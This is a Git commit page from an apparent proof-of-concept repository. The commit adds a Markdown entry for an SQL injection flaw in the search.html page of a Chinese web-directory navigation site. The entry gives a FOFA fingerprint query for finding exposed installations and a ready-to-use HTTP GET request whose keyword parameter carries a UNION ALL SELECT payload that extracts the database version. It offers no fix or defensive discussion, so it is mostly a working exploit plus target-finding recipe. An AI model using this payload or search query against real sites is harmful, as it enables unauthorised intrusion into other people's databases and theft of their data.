dontian122/POC
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

523更新漏洞

Browse Source
This commit is contained in:
wy876
2024-05-23 20:05:33 +08:00
parent 3567879c5a
commit fc8b2af0d2
13 changed files with 352 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

21
懒人网址导航页search.html存在SQL注入漏洞.md Normal file
View File

@@ -0,0 +1,21 @@
## 懒人网址导航页search.html存在SQL注入漏洞
## fofa
```
body="./templates/antidote/css/style.css"
```
## poc
```
GET /search.html?keyword='+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x2d2d2d2d2d,version(),0x2d2d2d2d2d),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: keep-alive
```